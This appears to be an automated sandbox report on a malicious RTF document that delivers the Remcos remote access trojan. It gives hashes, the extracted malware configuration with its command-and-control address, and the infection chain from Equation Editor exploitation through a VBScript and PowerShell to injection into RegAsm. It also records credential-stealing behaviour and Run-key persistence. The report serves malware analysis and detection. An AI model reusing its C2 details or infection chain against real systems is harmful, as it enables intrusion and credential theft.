remcos | fc8d8e349b245c33b43169523d6d8ebbc617f07d3ec592bc71eccba272a53bed

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
21-03-2024 04:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e7b1dab5d64b8e37ab2c8b0a05fd486c.rtf
Size

61KB
MD5

e7b1dab5d64b8e37ab2c8b0a05fd486c
SHA1

5ae4d3a7dec17b9740d4573e8f1014769e683f79
SHA256

fc8d8e349b245c33b43169523d6d8ebbc617f07d3ec592bc71eccba272a53bed
SHA512

1d68bb3e96612a9dca2a7d7dbfcf17297e0c39ed6e9dd7425c21176723393dfbbf6133c7cf1441e1a971fe8d46b89d08fda9fab02679efe24e70948d187ff710
SSDEEP

768:44BZj16/joel758XI4BRQU/uPDr/MN/OEu3gAG188:RBZY/Uel6XPQU/C/MUEua

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

107.172.31.178:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-NVSJ5U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/3012-185-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/3012-183-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/3012-201-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/312-171-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/312-173-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/312-191-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/312-171-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/312-173-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1744-184-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/3012-185-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/3012-183-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1744-181-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1744-186-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/312-191-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/3012-201-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 7 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

3 2580 EQNEDT32.EXE
7 2496 WScript.exe
9 2496 WScript.exe
11 2752 powershell.exe
13 2752 powershell.exe
15 2752 powershell.exe
16 2752 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
3	2580	EQNEDT32.EXE
7	2496	WScript.exe
9	2496	WScript.exe
11	2752	powershell.exe
13	2752	powershell.exe
15	2752	powershell.exe
16	2752	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\RMB.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 2752 set thread context of 2064	2752	powershell.exe	RegAsm.exe
PID 2064 set thread context of 312	2064	RegAsm.exe	RegAsm.exe
PID 2064 set thread context of 3012	2064	RegAsm.exe	RegAsm.exe
PID 2064 set thread context of 1744	2064	RegAsm.exe	RegAsm.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2580 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
2580	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

868 WINWORD.EXE

pid	process
868	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid	process
1912	powershell.exe
2752	powershell.exe
1684	powershell.exe
2752	powershell.exe
2752	powershell.exe
2752	powershell.exe
2752	powershell.exe
312	RegAsm.exe
312	RegAsm.exe

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

RegAsm.exe

pid process

2064 RegAsm.exe
2064 RegAsm.exe
2064 RegAsm.exe
2064 RegAsm.exe
2064 RegAsm.exe
2064 RegAsm.exe
2064 RegAsm.exe

pid	process
2064	RegAsm.exe
2064	RegAsm.exe
2064	RegAsm.exe
2064	RegAsm.exe
2064	RegAsm.exe
2064	RegAsm.exe
2064	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	1744	RegAsm.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

868 WINWORD.EXE
868 WINWORD.EXE

pid	process
868	WINWORD.EXE
868	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEpowershell.exeRegAsm.exe

description	pid	process	target process
PID 2580 wrote to memory of 2496	2580	EQNEDT32.EXE	WScript.exe
PID 2580 wrote to memory of 2496	2580	EQNEDT32.EXE	WScript.exe
PID 2580 wrote to memory of 2496	2580	EQNEDT32.EXE	WScript.exe
PID 2580 wrote to memory of 2496	2580	EQNEDT32.EXE	WScript.exe
PID 2496 wrote to memory of 1912	2496	WScript.exe	powershell.exe
PID 2496 wrote to memory of 1912	2496	WScript.exe	powershell.exe
PID 2496 wrote to memory of 1912	2496	WScript.exe	powershell.exe
PID 2496 wrote to memory of 1912	2496	WScript.exe	powershell.exe
PID 1912 wrote to memory of 2752	1912	powershell.exe	powershell.exe
PID 1912 wrote to memory of 2752	1912	powershell.exe	powershell.exe
PID 1912 wrote to memory of 2752	1912	powershell.exe	powershell.exe
PID 1912 wrote to memory of 2752	1912	powershell.exe	powershell.exe
PID 868 wrote to memory of 576	868	WINWORD.EXE	splwow64.exe
PID 868 wrote to memory of 576	868	WINWORD.EXE	splwow64.exe
PID 868 wrote to memory of 576	868	WINWORD.EXE	splwow64.exe
PID 868 wrote to memory of 576	868	WINWORD.EXE	splwow64.exe
PID 2752 wrote to memory of 1684	2752	powershell.exe	powershell.exe
PID 2752 wrote to memory of 1684	2752	powershell.exe	powershell.exe
PID 2752 wrote to memory of 1684	2752	powershell.exe	powershell.exe
PID 2752 wrote to memory of 1684	2752	powershell.exe	powershell.exe
PID 2752 wrote to memory of 2112	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2112	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2112	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2112	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2112	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2112	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2112	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2164	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2164	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2164	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2164	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2164	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2164	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2164	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2752 wrote to memory of 2064	2752	powershell.exe	RegAsm.exe
PID 2064 wrote to memory of 500	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 500	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 500	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 500	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 500	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 500	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 500	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 2032	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 2032	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 2032	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 2032	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 2032	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 2032	2064	RegAsm.exe	RegAsm.exe
PID 2064 wrote to memory of 2032	2064	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e7b1dab5d64b8e37ab2c8b0a05fd486c.rtf"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:576

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2580

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\imaginepixelmediakiss.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2496

